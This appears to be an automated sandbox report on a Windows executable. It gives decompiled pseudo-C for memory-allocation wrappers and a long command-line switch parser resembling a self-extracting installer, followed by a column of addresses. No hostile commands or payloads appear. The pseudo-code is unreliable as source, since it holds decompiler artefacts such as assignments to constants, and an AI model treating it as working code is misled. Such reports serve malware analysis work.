                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 00024CAA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3761449716-0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00024CC0(void* _a4) {
                                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                                				return _t2;
                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E00025C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                				CHAR* _v265;
                                                                                                                                                                                                                                                				char _v266;
                                                                                                                                                                                                                                                				char _v267;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				CHAR* _v272;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				signed int _v296;
                                                                                                                                                                                                                                                				char _v556;
                                                                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                                                                				int _t63;
                                                                                                                                                                                                                                                				char _t67;
                                                                                                                                                                                                                                                				CHAR* _t69;
                                                                                                                                                                                                                                                				signed int _t71;
                                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                                				char _t79;
                                                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				intOrPtr _t88;
                                                                                                                                                                                                                                                				void* _t100;
                                                                                                                                                                                                                                                				intOrPtr _t101;
                                                                                                                                                                                                                                                				CHAR* _t104;
                                                                                                                                                                                                                                                				intOrPtr _t105;
                                                                                                                                                                                                                                                				void* _t111;
                                                                                                                                                                                                                                                				void* _t115;
                                                                                                                                                                                                                                                				CHAR* _t118;
                                                                                                                                                                                                                                                				void* _t119;
                                                                                                                                                                                                                                                				void* _t127;
                                                                                                                                                                                                                                                				CHAR* _t129;
                                                                                                                                                                                                                                                				void* _t132;
                                                                                                                                                                                                                                                				void* _t142;
                                                                                                                                                                                                                                                				signed int _t143;
                                                                                                                                                                                                                                                				CHAR* _t144;
                                                                                                                                                                                                                                                				void* _t145;
                                                                                                                                                                                                                                                				void* _t146;
                                                                                                                                                                                                                                                				void* _t147;
                                                                                                                                                                                                                                                				void* _t149;
                                                                                                                                                                                                                                                				char _t155;
                                                                                                                                                                                                                                                				void* _t157;
                                                                                                                                                                                                                                                				void* _t162;
                                                                                                                                                                                                                                                				void* _t163;
                                                                                                                                                                                                                                                				char _t167;
                                                                                                                                                                                                                                                				char _t170;
                                                                                                                                                                                                                                                				CHAR* _t173;
                                                                                                                                                                                                                                                				void* _t177;
                                                                                                                                                                                                                                                				intOrPtr* _t183;
                                                                                                                                                                                                                                                				intOrPtr* _t192;
                                                                                                                                                                                                                                                				CHAR* _t199;
                                                                                                                                                                                                                                                				void* _t200;
                                                                                                                                                                                                                                                				CHAR* _t201;
                                                                                                                                                                                                                                                				void* _t205;
                                                                                                                                                                                                                                                				void* _t206;
                                                                                                                                                                                                                                                				int _t209;
                                                                                                                                                                                                                                                				void* _t210;
                                                                                                                                                                                                                                                				void* _t212;
                                                                                                                                                                                                                                                				void* _t213;
                                                                                                                                                                                                                                                				CHAR* _t218;
                                                                                                                                                                                                                                                				intOrPtr* _t219;
                                                                                                                                                                                                                                                				intOrPtr* _t220;
                                                                                                                                                                                                                                                				signed int _t221;
                                                                                                                                                                                                                                                				signed int _t223;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t173 = __ecx;
                                                                                                                                                                                                                                                				_t61 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                                				_push(__ebx);
                                                                                                                                                                                                                                                				_push(__esi);
                                                                                                                                                                                                                                                				_push(__edi);
                                                                                                                                                                                                                                                				_t209 = 1;
                                                                                                                                                                                                                                                				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                                					_t63 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					while(_t209 != 0) {
                                                                                                                                                                                                                                                						_t67 =  *_t173;
                                                                                                                                                                                                                                                						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                                							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_v272 = _t173;
                                                                                                                                                                                                                                                						if(_t67 == 0) {
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t69 = _v272;
                                                                                                                                                                                                                                                							_t177 = 0;
                                                                                                                                                                                                                                                							_t213 = 0;
                                                                                                                                                                                                                                                							_t163 = 0;
                                                                                                                                                                                                                                                							_t202 = 1;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								if(_t213 != 0) {
                                                                                                                                                                                                                                                									if(_t163 != 0) {
                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L21;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t69 =  *_t69;
                                                                                                                                                                                                                                                									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t69 = _v272;
                                                                                                                                                                                                                                                										L21:
                                                                                                                                                                                                                                                										_t155 =  *_t69;
                                                                                                                                                                                                                                                										if(_t155 != 0x22) {
                                                                                                                                                                                                                                                											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                                												goto L106;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                                												_t177 = _t177 + 1;
                                                                                                                                                                                                                                                												_t202 = _t202 + 1;
                                                                                                                                                                                                                                                												_t157 = 1;
                                                                                                                                                                                                                                                												goto L30;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                                												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                                													L106:
                                                                                                                                                                                                                                                													_t63 = 0;
                                                                                                                                                                                                                                                													L125:
                                                                                                                                                                                                                                                													_pop(_t210);
                                                                                                                                                                                                                                                													_pop(_t212);
                                                                                                                                                                                                                                                													_pop(_t162);
                                                                                                                                                                                                                                                													return E00026CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                                													_t177 = _t177 + 1;
                                                                                                                                                                                                                                                													_t202 = _t202 + 1;
                                                                                                                                                                                                                                                													_t157 = 2;
                                                                                                                                                                                                                                                													goto L30;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t157 = 1;
                                                                                                                                                                                                                                                												if(_t213 != 0) {
                                                                                                                                                                                                                                                													_t163 = 1;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t213 = 1;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L30;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L131;
                                                                                                                                                                                                                                                								L30:
                                                                                                                                                                                                                                                								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                                								_t69 = _v272;
                                                                                                                                                                                                                                                							} while ( *_t69 != 0);
                                                                                                                                                                                                                                                							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                                								E00026E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                                								asm("int3");
                                                                                                                                                                                                                                                								_push(_t221);
                                                                                                                                                                                                                                                								_t222 = _t223;
                                                                                                                                                                                                                                                								_t71 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                                								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                                									0x4f0 = 2;
                                                                                                                                                                                                                                                									_t75 = E0002597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E000244B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                                									 *0x29124 = E00026285();
                                                                                                                                                                                                                                                									_t75 = 0;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								return E00026CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                                								if(_t213 == 0) {
                                                                                                                                                                                                                                                									if(_t163 != 0) {
                                                                                                                                                                                                                                                										goto L34;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										goto L40;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									if(_t163 != 0) {
                                                                                                                                                                                                                                                										L40:
                                                                                                                                                                                                                                                										_t79 = _v268;
                                                                                                                                                                                                                                                										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                                											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                                											if(_t83 == 0) {
                                                                                                                                                                                                                                                												_t202 = 0x521;
                                                                                                                                                                                                                                                												E000244B9(0, 0x521, 0x21140, 0, 0x40, 0);
                                                                                                                                                                                                                                                												_t85 =  *0x28588; // 0x0
                                                                                                                                                                                                                                                												if(_t85 != 0) {
                                                                                                                                                                                                                                                													CloseHandle(_t85);
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												ExitProcess(0);
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                											_t87 = _t83 - 4;
                                                                                                                                                                                                                                                											if(_t87 == 0) {
                                                                                                                                                                                                                                                												if(_v266 != 0) {
                                                                                                                                                                                                                                                													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                														goto L49;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                                														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                                														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                                														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                                														_t202 = _t50;
                                                                                                                                                                                                                                                														do {
                                                                                                                                                                                                                                                															_t88 =  *_t183;
                                                                                                                                                                                                                                                															_t183 = _t183 + 1;
                                                                                                                                                                                                                                                														} while (_t88 != 0);
                                                                                                                                                                                                                                                														if(_t183 == _t202) {
                                                                                                                                                                                                                                                															goto L49;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t205 = 0x5b;
                                                                                                                                                                                                                                                															if(E0002667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                                																L115:
                                                                                                                                                                                                                                                																_t206 = 0x5d;
                                                                                                                                                                                                                                                																if(E0002667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                                																	L117:
                                                                                                                                                                                                                                                																	_t202 =  &_v276;
                                                                                                                                                                                                                                                																	_v276 = _t167;
                                                                                                                                                                                                                                                																	if(E00025C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                                																		goto L49;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		_t202 = 0x104;
                                                                                                                                                                                                                                                																		E00021680(0x28c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	_t202 = 0x5b;
                                                                                                                                                                                                                                                																	if(E0002667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                                																		goto L49;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		goto L117;
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																_t202 = 0x5d;
                                                                                                                                                                                                                                                																if(E0002667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                                																	goto L49;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	goto L115;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													 *0x28a24 = 1;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L50;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t100 = _t87 - 1;
                                                                                                                                                                                                                                                												if(_t100 == 0) {
                                                                                                                                                                                                                                                													L98:
                                                                                                                                                                                                                                                													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                														goto L49;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                                														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                                														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                                														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                                														_t202 = _t38;
                                                                                                                                                                                                                                                														do {
                                                                                                                                                                                                                                                															_t101 =  *_t192;
                                                                                                                                                                                                                                                															_t192 = _t192 + 1;
                                                                                                                                                                                                                                                														} while (_t101 != 0);
                                                                                                                                                                                                                                                														if(_t192 == _t202) {
                                                                                                                                                                                                                                                															goto L49;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t202 =  &_v276;
                                                                                                                                                                                                                                                															_v276 = _t170;
                                                                                                                                                                                                                                                															if(E00025C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                                																goto L49;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                                																_t218 = 0x28b3e;
                                                                                                                                                                                                                                                																_t105 = _v276;
                                                                                                                                                                                                                                                																if(_t104 != 0x54) {
                                                                                                                                                                                                                                                																	_t218 = 0x28a3a;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                																E00021680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                                																_t202 = 0x104;
                                                                                                                                                                                                                                                																E0002658A(_t218, 0x104, 0x21140);
                                                                                                                                                                                                                                                																if(E000231E0(_t218) != 0) {
                                                                                                                                                                                                                                                																	goto L50;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	goto L106;
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                                													if(_t111 == 0) {
                                                                                                                                                                                                                                                														if(_v266 != 0) {
                                                                                                                                                                                                                                                															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																goto L49;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																_t199 = _v265;
                                                                                                                                                                                                                                                																if(_t199 != 0) {
                                                                                                                                                                                                                                                																	_t219 =  &_v265;
                                                                                                                                                                                                                                                																	do {
                                                                                                                                                                                                                                                																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                                																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                                																		if(_t115 == 0) {
                                                                                                                                                                                                                                                																			 *0x28a2c = 1;
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			_t200 = 2;
                                                                                                                                                                                                                                                																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                                																			if(_t119 == 0) {
                                                                                                                                                                                                                                                																				 *0x28a30 = 1;
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                                																					 *0x28a34 = 1;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t209 = 0;
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																		_t118 =  *_t219;
                                                                                                                                                                                                                                                																		_t199 = _t118;
                                                                                                                                                                                                                                                																	} while (_t118 != 0);
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															 *0x28a2c = 1;
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                														goto L50;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														_t127 = _t111 - 3;
                                                                                                                                                                                                                                                														if(_t127 == 0) {
                                                                                                                                                                                                                                                															if(_v266 != 0) {
                                                                                                                                                                                                                                                																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																	goto L49;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                                																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                                																		goto L76;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                                																			goto L83;
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                                																				goto L76;
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				goto L49;
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																L76:
                                                                                                                                                                                                                                                																_push(2);
                                                                                                                                                                                                                                                																_pop(1);
                                                                                                                                                                                                                                                																L83:
                                                                                                                                                                                                                                                																 *0x28a38 = 1;
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                															goto L50;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t132 = _t127 - 1;
                                                                                                                                                                                                                                                															if(_t132 == 0) {
                                                                                                                                                                                                                                                																if(_v266 != 0) {
                                                                                                                                                                                                                                                																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                                																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                                																			goto L49;
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		_t201 = _v265;
                                                                                                                                                                                                                                                																		 *0x29a2c = 1;
                                                                                                                                                                                                                                                																		if(_t201 != 0) {
                                                                                                                                                                                                                                                																			_t220 =  &_v265;
                                                                                                                                                                                                                                                																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x29a2c =  *0x29a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x28d48 =  *0x28d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x29a2c =  *0x29a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x29a2c =  *0x29a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x28d48 =  *0x28d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x29a2c =  *0x29a2c | 0x00000004;
																										L70:
																										 *0x28a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x29a2c = 3;
																	 *0x28a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x28a2c != 0 &&  *0x28b3e == 0) {
						if(GetModuleFileNameA( *0x29a3c, 0x28b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E000266C8(0x28b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}
                                                                                                                                                                                                                                                0x00025d9d
                                                                                                                                                                                                                                                0x00025d9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d9e
                                                                                                                                                                                                                                                0x00025d51
                                                                                                                                                                                                                                                0x00025d5b
                                                                                                                                                                                                                                                0x00025d72
                                                                                                                                                                                                                                                0x000260fb
                                                                                                                                                                                                                                                0x000260fb
                                                                                                                                                                                                                                                0x00026207
                                                                                                                                                                                                                                                0x0002620a
                                                                                                                                                                                                                                                0x0002620b
                                                                                                                                                                                                                                                0x0002620e
                                                                                                                                                                                                                                                0x00026217
                                                                                                                                                                                                                                                0x00025d78
                                                                                                                                                                                                                                                0x00025d78
                                                                                                                                                                                                                                                0x00025d80
                                                                                                                                                                                                                                                0x00025d83
                                                                                                                                                                                                                                                0x00025d84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d84
                                                                                                                                                                                                                                                0x00025d5d
                                                                                                                                                                                                                                                0x00025d5f
                                                                                                                                                                                                                                                0x00025d62
                                                                                                                                                                                                                                                0x00025d68
                                                                                                                                                                                                                                                0x00025d64
                                                                                                                                                                                                                                                0x00025d64
                                                                                                                                                                                                                                                0x00025d64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d62
                                                                                                                                                                                                                                                0x00025d5b
                                                                                                                                                                                                                                                0x00025d4f
                                                                                                                                                                                                                                                0x00025d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025d9f
                                                                                                                                                                                                                                                0x00025d9f
                                                                                                                                                                                                                                                0x00025da5
                                                                                                                                                                                                                                                0x00025dab
                                                                                                                                                                                                                                                0x00025dba
                                                                                                                                                                                                                                                0x00026218
                                                                                                                                                                                                                                                0x0002621d
                                                                                                                                                                                                                                                0x00026220
                                                                                                                                                                                                                                                0x00026221
                                                                                                                                                                                                                                                0x00026229
                                                                                                                                                                                                                                                0x00026230
                                                                                                                                                                                                                                                0x00026247
                                                                                                                                                                                                                                                0x0002626a
                                                                                                                                                                                                                                                0x00026272
                                                                                                                                                                                                                                                0x00026249
                                                                                                                                                                                                                                                0x00026255
                                                                                                                                                                                                                                                0x0002625f
                                                                                                                                                                                                                                                0x00026264
                                                                                                                                                                                                                                                0x00026264
                                                                                                                                                                                                                                                0x00026284
                                                                                                                                                                                                                                                0x00025dc0
                                                                                                                                                                                                                                                0x00025dc0
                                                                                                                                                                                                                                                0x00025dca
                                                                                                                                                                                                                                                0x00025e22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025dcc
                                                                                                                                                                                                                                                0x00025dce
                                                                                                                                                                                                                                                0x00025e24
                                                                                                                                                                                                                                                0x00025e24
                                                                                                                                                                                                                                                0x00025e2c
                                                                                                                                                                                                                                                0x00025e47
                                                                                                                                                                                                                                                0x00025e4a
                                                                                                                                                                                                                                                0x000261d2
                                                                                                                                                                                                                                                0x000261e2
                                                                                                                                                                                                                                                0x000261e7
                                                                                                                                                                                                                                                0x000261ee
                                                                                                                                                                                                                                                0x000261f1
                                                                                                                                                                                                                                                0x000261f1
                                                                                                                                                                                                                                                0x000261f8
                                                                                                                                                                                                                                                0x000261f8
                                                                                                                                                                                                                                                0x00025e50
                                                                                                                                                                                                                                                0x00025e53
                                                                                                                                                                                                                                                0x00026109
                                                                                                                                                                                                                                                0x0002611f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026125
                                                                                                                                                                                                                                                0x00026137
                                                                                                                                                                                                                                                0x0002613a
                                                                                                                                                                                                                                                0x0002613c
                                                                                                                                                                                                                                                0x0002613e
                                                                                                                                                                                                                                                0x0002613e
                                                                                                                                                                                                                                                0x00026141
                                                                                                                                                                                                                                                0x00026141
                                                                                                                                                                                                                                                0x00026143
                                                                                                                                                                                                                                                0x00026144
                                                                                                                                                                                                                                                0x0002614a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026150
                                                                                                                                                                                                                                                0x00026152
                                                                                                                                                                                                                                                0x0002615c
                                                                                                                                                                                                                                                0x00026170
                                                                                                                                                                                                                                                0x00026172
                                                                                                                                                                                                                                                0x0002617c
                                                                                                                                                                                                                                                0x00026190
                                                                                                                                                                                                                                                0x00026190
                                                                                                                                                                                                                                                0x00026196
                                                                                                                                                                                                                                                0x000261a5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000261ab
                                                                                                                                                                                                                                                0x000261b9
                                                                                                                                                                                                                                                0x000261c6
                                                                                                                                                                                                                                                0x000261c6
                                                                                                                                                                                                                                                0x0002617e
                                                                                                                                                                                                                                                0x00026180
                                                                                                                                                                                                                                                0x0002618a
                                                                                                                                                                                                                                                0x00025f3f
                                                                                                                                                                                                                                                0x00025f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025eef
                                                                                                                                                                                                                                                0x00025eef
                                                                                                                                                                                                                                                0x00025ef2
                                                                                                                                                                                                                                                0x00025f34
                                                                                                                                                                                                                                                0x00025ef4
                                                                                                                                                                                                                                                0x00025ef4
                                                                                                                                                                                                                                                0x00025ef7
                                                                                                                                                                                                                                                0x00025f2b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025ef9
                                                                                                                                                                                                                                                0x00025ef9
                                                                                                                                                                                                                                                0x00025efc
                                                                                                                                                                                                                                                0x00025f22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025efe
                                                                                                                                                                                                                                                0x00025eff
                                                                                                                                                                                                                                                0x00025f02
                                                                                                                                                                                                                                                0x00025f16
                                                                                                                                                                                                                                                0x00025f04
                                                                                                                                                                                                                                                0x00025f07
                                                                                                                                                                                                                                                0x00025f0d
                                                                                                                                                                                                                                                0x00025f46
                                                                                                                                                                                                                                                0x00025f46
                                                                                                                                                                                                                                                0x00025f09
                                                                                                                                                                                                                                                0x00025f09
                                                                                                                                                                                                                                                0x00025f09
                                                                                                                                                                                                                                                0x00025f07
                                                                                                                                                                                                                                                0x00025f02
                                                                                                                                                                                                                                                0x00025efc
